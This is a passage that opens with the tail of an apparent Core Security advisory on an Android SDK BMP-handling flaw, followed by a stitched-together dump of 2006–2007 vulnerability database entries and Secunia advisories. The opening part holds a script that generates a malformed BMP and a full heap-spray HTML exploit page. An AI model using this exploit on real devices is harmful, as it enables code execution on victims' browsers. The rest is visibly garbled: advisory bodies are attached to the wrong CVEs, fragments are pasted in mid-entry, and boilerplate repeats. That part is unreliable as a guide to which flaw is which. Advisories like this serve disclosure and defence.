bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
- -----------/
Opening the BMP file generated with this script inside a HTML page will
cause (sometimes, as it is dependent on an uninitialized variable) the
following output of the gdb debugger:
/-----------
(gdb) attach 1574
attach 1574
Attaching to program: /system/bin/app_process, process 1574
...
0xafe0d204 in __futex_wait () from /system/lib/libc.so
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb)
- -----------/
Here the browser process has jumped to the '0x00000000' address because
that is the value at 0x00ffffff+0x10. We can change this value using
common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
<HTML>
<HEAD>
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
var nop = unescape("%u4000%u4000");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<2;i++)
document.write(nop)
</script>
<IMG src=badbmp.bmp>
</BODY>
</HTML>
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach
the address '0xffffff' it is very slow and the default memory
configuration of Android will often abort the process before reaching
the desired point. To overcome this limitation for demonstration
purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory,
plenty for the exploit to work.
This security bug affects Android SDK m5-rc14 and earlier versions.
*Report Timeline*
. 2008-01-30: Vendor is notified that possibly exploitable
vulnerabilities where discovered and that an advisory draft is
available. This affects Android SDK m3-rc37a and earlier versions. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to
generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for
the open source community, but agree they can fix the problem on the
estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a
vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new
findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found
will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core
receives no notification. 2008-02-13: Core sends the vendor more malformed images, including
GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory,
including a BMP PoC that runs arbitrary ARM code and informs the vendor
that we noticed that the recent m5-rc14 release fixed the GIF and PNG
bugs. Publication of CORE-2008-0124 has been re-=scheduled for February
27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been
released and provides an official statement to the "Vendor Section" of
the advisory. A final review of the advisory is requested before its
release. The vendor indicates that the Android SDK is still in
development and stabilization won't happen until it gets closer to
Alpha. Changes to fix the BMP issue are coming soon, priorities are
given to issues listed in the public issue tracking system at
http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has
been moved to March 3rd 2008, asks if an estimated date for the BMP fix
is available and if Core should file the reported and any future bugs
in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to
the vendor as requested. Core requests for any additional comments or
statements to be provided by noon March 3rd, 2008 (UTC-5)
. 2008-03-01: Vendor requests publication to be delayed one day in
order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP
vulnerability. Vendor indicates that Android applications run with
the credentials of an unprivileged user which decreases the severity of
the issues found
. 2008-03-04: Further research by Alfredo Ortega reveals that although
the vendor statement is correct current versions of Android SDK ship
with a passwordless root account. Unprivileged users with shell access
can simply use the 'su' program to gain privileges
. 2008-03-04: Advisory CORE-2008-0124 is published.
*References*
[1] Android Overview - Open Handset Alliance -
http://www.openhandsetalliance.com/android_overview.html
[2] "Android Comes to Life in Barcelona" - The Washington Post ,
February 11th, 2008 -
http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html
[3] Android Developer Challenge - http://code.google.com/android/adc.html
[4] "Test Center Preview: Inside Google's Mobile future" - Inforworld,
Feb. 27th 2008 -
http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html
[5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th,
2008
http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html
[6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes
by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte.
Wiley; 2nd edition (August 20, 2007) -
http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html
[7] Graphics Interchange Format version 89a -
http://www.w3.org/Graphics/GIF/spec-gif89a.txt
[8] Android downloads page http://code.google.com/p/android/downloads/list
[9] Portable Network Graphics (PNG) specification -
http://www.w3.org/TR/PNG/
[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I
teV3ahcSAUFEtsaRCeXVuN8=
=u35s
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. The Common Vulnerabilities and Exposures
(CVE) project assigned the id CVE-2006-5793 [2] to the problem. Follow the
instructions on http://openpkg.org/security/signatures/ for details on
how to verify the integrity of this advisory
| VAR-200611-0426 | CVE-2006-6015 | Safari of JavaScript Implementation buffer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Buffer overflow in the JavaScript implementation in Safari on Apple Mac OS X 10.4 allows remote attackers to cause a denial of service (application crash) via a long argument to the exec method of a regular expression. Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code.
An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.
Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected. There is a vulnerability in Apple Safari's processing of very long regular expression matching strings. Remote attackers may use this vulnerability to execute arbitrary commands on the user's machine. If a Safari user is tricked into visiting a site that contains malicious JavaScript, a vulnerability in regular expression processing could be triggered, causing the browser to crash or execute arbitrary commands
| VAR-200611-0141 | CVE-2006-5882 | Broadcom wireless driver fails to properly process 802.11 probe response frames |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in the Broadcom BCMWL5.SYS wireless device driver 3.50.21.10, as used in Cisco Linksys WPC300N Wireless-N Notebook Adapter before 4.100.15.5 and other products, allows remote attackers to execute arbitrary code via an 802.11 response frame containing a long SSID field. A buffer overflow vulnerability exists in the Broadcom BCMWL5.SYS wireless driver. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code, or cause a denial-of-service condition.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Broadcom Wireless Driver Probe Response SSID Buffer Overflow
SECUNIA ADVISORY ID:
SA22831
VERIFY ADVISORY:
http://secunia.com/advisories/22831/
CRITICAL:
Moderately critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
Broadcom NIDS 5.0 Wireless Driver 3.x
http://secunia.com/product/12559/
DESCRIPTION:
Johnny Cache has reported a vulnerability in Broadcom Wireless
driver, which potentially can be exploited by malicious people to
compromise a vulnerable system.
The vulnerability is caused due to a boundary error in the BCMWL5.SYS
device driver when handling probe response requests with a long SSID.
This can be exploited to cause a stack-based buffer overflow via a
specially crafted packet.
The vulnerability is reported in version 3.50.21.10. Other versions
may also be affected.
SOLUTION:
Update to the latest version.
Linksys:
http://www.linksys.com/servlet/Satellite?c=L_Download_C2&childpagename=US%2FLayout&cid=1115417109934&packedargs=sku%3D1144763513196&pagename=Linksys%2FCommon%2FVisitorWrapper
Turn off the wireless card when not in use.
PROVIDED AND/OR DISCOVERED BY:
Johnny Cache
ORIGINAL ADVISORY:
http://projects.info-pull.com/mokb/MOKB-11-11-2006.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0508 | CVE-2006-6055 | D-Link DWL-G132 Wireless adapter A5AGU.SYS Vulnerable to stack-based buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in A5AGU.SYS 1.0.1.41 for the D-Link DWL-G132 wireless adapter allows remote attackers to execute arbitrary code via a 802.11 beacon request with a long Rates information element (IE). D-LINK DWL-G132 is a high performance 802.11g wireless network card.
D-Link DWL-G132 wireless network card A5AGU.SYS driver has a stack overflow vulnerability. A remote attacker may use this vulnerability to execute arbitrary instructions on the user's machine. Because the overflow is triggered by a beacon frame, all network cards in the attack range are affected. The D-Link Wireless Device Driver for DWL-G132 devices is prone to a stack-based buffer-overflow vulnerability because the driver fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
Exploiting this issue allows attackers to execute arbitrary machine code in the context of the kernel hosting the vulnerable driver. Failed attempts will likely crash the kernel, resulting in denial-of-service conditions.
The ASAGU.SYS driver is primarily used on the Microsoft Window operating system. Note, however, that Linux and BSD machines using the 'ndiswrapper' tool should determine if they are using a vulnerable instance of the driver.
Note also that this vulnerability can be exploited only when an attacker is within the range of broadcast of 802.11 wireless connections.
Version 1.0.1.41 of the ASAGU.SYS driver is reported vulnerable; other versions may also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
D-Link DWL-G132 Wireless Driver Beacon Rates Buffer Overflow
SECUNIA ADVISORY ID:
SA22860
VERIFY ADVISORY:
http://secunia.com/advisories/22860/
CRITICAL:
Moderately critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
D-Link Wireless USB Network Adapter Driver 1.x
http://secunia.com/product/12585/
DESCRIPTION:
H D Moore has reported a vulnerability in D-Link DWL-G132 Wireless
driver, which can be exploited by malicious people to compromise a
vulnerable system. This can be exploited to
cause a stack-based buffer overflow via a specially crafted packet.
PROVIDED AND/OR DISCOVERED BY:
H D Moore
ORIGINAL ADVISORY:
http://projects.info-pull.com/mokb/MOKB-13-11-2006.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200701-0518 | CVE-2007-0023 | Apple UserNotificationCenter Local Privilege Escalation Vulnerability |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users to gain privileges via a malicious InputManager in Library/InputManagers in a user's home directory, which is executed when Cocoa applications attempt to notify the user. Apple's UserNotificationCenter contains a vulnerability that may allow local users to gain elevated privileges. According to Apple's information, gaining elevated privileges could result in unauthorized overwriting or modification of system files. This issue stems from a flaw in the UserNotificationCenter application that results in arbitrary code-execution with wheel-group privileges.
This issue affects Apple Mac OS X version 10.4.8; other versions may also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
The vulnerability exists due to an error in the "fpathconf()" syscall
when it is called with an unsupported file type and can be exploited
to cause a system panic.
The vulnerability is confirmed in version 10.4.8. Other versions may
also be affected.
SOLUTION:
Grant only trusted users access to affected systems.
PROVIDED AND/OR DISCOVERED BY:
Initially discovered in FreeBSD and reported in Mac OS X by Ilja Van
Sprundel.
ORIGINAL ADVISORY:
http://projects.info-pull.com/mokb/MOKB-09-11-2006.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200701-0516 | CVE-2007-0021 | Apple iChat AIM URI handler format string vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Format string vulnerability in Apple iChat 3.1.6 allows remote attackers to cause a denial of service (null pointer dereference and application crash) and possibly execute arbitrary code via format string specifiers in an aim:// URI. Apple iChat contains a format string vulnerability. This vulnerability may allow a remote, unauthenticated attacker to execute arbitary code. A vulnerability in the way Apple Mac OS X handles corrupted Universal Mach-O Binaries may result in execution of arbitrary code or denial of service. Apple iChat is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function.
Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application and to compromise affected computers.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
The vulnerability exists due to an error in the "fpathconf()" syscall
when it is called with an unsupported file type and can be exploited
to cause a system panic.
The vulnerability is confirmed in version 10.4.8.
SOLUTION:
Grant only trusted users access to affected systems.
PROVIDED AND/OR DISCOVERED BY:
Initially discovered in FreeBSD and reported in Mac OS X by Ilja Van
Sprundel.
ORIGINAL ADVISORY:
http://projects.info-pull.com/mokb/MOKB-09-11-2006.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0223 | CVE-2006-5806 | Cisco Secure Desktop of SSL VPN Client Vulnerable to reading unencrypted data |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
SSL VPN Client in Cisco Secure Desktop before 3.1.1.45, when configured to spawn a web browser after a successful connection, stores sensitive browser session information in a directory outside of the CSD vault and does not restrict the user from saving files outside of the vault, which is not cleared after the VPN connection terminates and allows local users to read unencrypted data. Cisco Secure Desktop is susceptible to multiple vulnerabilities. These issues are due to design flaws in the application.
Exploiting these issues allows local attackers to evade application security policies, to access sensitive information, and to gain local system privileges on affected computers.
These vulnerabilities affect Cisco Secure Desktop version 3.1.1.33 and prior. Local privilege escalation +------------------------ The default permissions of the directory where the CSD is installed and its parent directory allow any user to modify the contents of the CSD installation, including Reorder, delete and overwrite files. Unprivileged users can exploit this vulnerability to elevate their privileges and obtain localsystem-equivalent privileges by replacing certain CSD executables that run as system services with LocalSystem privileges. CSD is installed to the \\%SystemDrive\\%\Program Files\Cisco Systems\Secure Desktop\ directory by default. Note that some other Cisco products install their files into the \\%SystemDrive\\%\Program Files\Cisco Systems\ directory. So a side effect of this vulnerability in CSD is that if other products are installed after the vulnerable version of CSD is installed, those products will also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Cisco Secure Desktop Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA22747
VERIFY ADVISORY:
http://secunia.com/advisories/22747/
CRITICAL:
Less critical
IMPACT:
Security Bypass, Exposure of sensitive information, Privilege
escalation
WHERE:
Local system
SOFTWARE:
Cisco Secure Desktop 3.x
http://secunia.com/product/7726/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Secure Desktop,
which can be exploited by malicious, local users to gain knowledge of
sensitive information, bypass certain security restrictions, or gain
escalated privileges on a vulnerable system.
Successful exploitation requires that Cisco SSL VPN is configured to
automatically spawn a browser after a successful connection.
2) Users are able to switch between the Secure Desktop and the Local
(non-secure) Desktop when using applications that attempt to switch
to the default desktop.
3) When installed on an NTFS file system, insecure default
permissions are placed on the installation directory. This can be
exploited to remove, manipulate, and replace any of the application's
file.
Successful exploitation allows execution of arbitrary commands with
SYSTEM privileges.
SOLUTION:
Update to version 3.1.1.45.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Reported by the vendor
3) Titon, Bastard Labs.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20061108-csd.shtml
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=442
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0225 | CVE-2006-5808 | CSD Vulnerabilities that have been granted privileges in the installation of |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
The installation of Cisco Secure Desktop (CSD) before 3.1.1.45 uses insecure default permissions (all users full control) for the CSD directory and its parent directory, which allow local users to gain privileges by replacing CSD executables, aka "Local Privilege Escalation". Cisco Secure Desktop is susceptible to multiple vulnerabilities. These issues are due to design flaws in the application.
Exploiting these issues allows local attackers to evade application security policies, to access sensitive information, and to gain local system privileges on affected computers.
These vulnerabilities affect Cisco Secure Desktop version 3.1.1.33 and prior. Cisco Secure Desktop (CSD) uses encryption to reduce the risk of cookies, browser history, temporary files, and downloads being left on the system after a remote user logs off or an SSL VPN session times out. Unprivileged users can exploit this vulnerability to elevate their privileges and obtain localsystem-equivalent privileges by replacing certain CSD executables that run as system services with LocalSystem privileges. Note that some other Cisco products install their files into the \\%SystemDrive\\%\Program Files\Cisco Systems\ directory. So a side effect of this vulnerability in CSD is that if other products are installed after the vulnerable version of CSD is installed, those products will also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Cisco Secure Desktop Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA22747
VERIFY ADVISORY:
http://secunia.com/advisories/22747/
CRITICAL:
Less critical
IMPACT:
Security Bypass, Exposure of sensitive information, Privilege
escalation
WHERE:
Local system
SOFTWARE:
Cisco Secure Desktop 3.x
http://secunia.com/product/7726/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Secure Desktop,
which can be exploited by malicious, local users to gain knowledge of
sensitive information, bypass certain security restrictions, or gain
escalated privileges on a vulnerable system.
1) Internet browsers that are automatically spawned after
establishing an SSL VPN connection uses a directory outside of the
CSD vault. Users are then able to save files downloaded during the
internet browsing session into the said directory, which results in
unencrypted files remaining in the system after the SSL VPN session.
Successful exploitation requires that Cisco SSL VPN is configured to
automatically spawn a browser after a successful connection.
2) Users are able to switch between the Secure Desktop and the Local
(non-secure) Desktop when using applications that attempt to switch
to the default desktop.
3) When installed on an NTFS file system, insecure default
permissions are placed on the installation directory. This can be
exploited to remove, manipulate, and replace any of the application's
file.
Successful exploitation allows execution of arbitrary commands with
SYSTEM privileges.
SOLUTION:
Update to version 3.1.1.45.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Reported by the vendor
3) Titon, Bastard Labs.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20061108-csd.shtml
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=442
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0224 | CVE-2006-5807 | CSD Vulnerabilities escaped from a secure desktop environment |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Cisco Secure Desktop (CSD) before 3.1.1.45 allows local users to escape out of the secure desktop environment by using certain applications that switch to the default desktop, aka "System Policy Evasion". These issues are due to design flaws in the application.
Exploiting these issues allows local attackers to evade application security policies, to access sensitive information, and to gain local system privileges on affected computers. Cisco Secure Desktop (CSD) uses encryption to reduce the risk of cookies, browser history, temporary files, and downloads being left on the system after a remote user logs off or an SSL VPN session times out. Local privilege escalation +------------------------ The default permissions of the directory where the CSD is installed and its parent directory allow any user to modify the contents of the CSD installation, including Reorder, delete and overwrite files. Unprivileged users can exploit this vulnerability to elevate their privileges and obtain localsystem-equivalent privileges by replacing certain CSD executables that run as system services with LocalSystem privileges. CSD is installed to the \\%SystemDrive\\%\Program Files\Cisco Systems\Secure Desktop\ directory by default. Note that some other Cisco products install their files into the \\%SystemDrive\\%\Program Files\Cisco Systems\ directory. So a side effect of this vulnerability in CSD is that if other products are installed after the vulnerable version of CSD is installed, those products will also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Cisco Secure Desktop Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA22747
VERIFY ADVISORY:
http://secunia.com/advisories/22747/
CRITICAL:
Less critical
IMPACT:
Security Bypass, Exposure of sensitive information, Privilege
escalation
WHERE:
Local system
SOFTWARE:
Cisco Secure Desktop 3.x
http://secunia.com/product/7726/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Secure Desktop,
which can be exploited by malicious, local users to gain knowledge of
sensitive information, bypass certain security restrictions, or gain
escalated privileges on a vulnerable system.
1) Internet browsers that are automatically spawned after
establishing an SSL VPN connection uses a directory outside of the
CSD vault. Users are then able to save files downloaded during the
internet browsing session into the said directory, which results in
unencrypted files remaining in the system after the SSL VPN session.
Successful exploitation requires that Cisco SSL VPN is configured to
automatically spawn a browser after a successful connection.
3) When installed on an NTFS file system, insecure default
permissions are placed on the installation directory. This can be
exploited to remove, manipulate, and replace any of the application's
file.
Successful exploitation allows execution of arbitrary commands with
SYSTEM privileges.
SOLUTION:
Update to version 3.1.1.45.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Reported by the vendor
3) Titon, Bastard Labs.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20061108-csd.shtml
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=442
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0339 | CVE-2006-5817 | Mac Build Security Bypass Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
prl_dhcpd in Parallels Desktop for Mac Build 1940 uses insecure permissions (0666) for /Library/Parallels/.dhcpd_configuration, which allows local users to modify DHCP configuration.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Parallels Desktop for Mac Insecure File Permissions
SECUNIA ADVISORY ID:
SA22634
VERIFY ADVISORY:
http://secunia.com/advisories/22634/
CRITICAL:
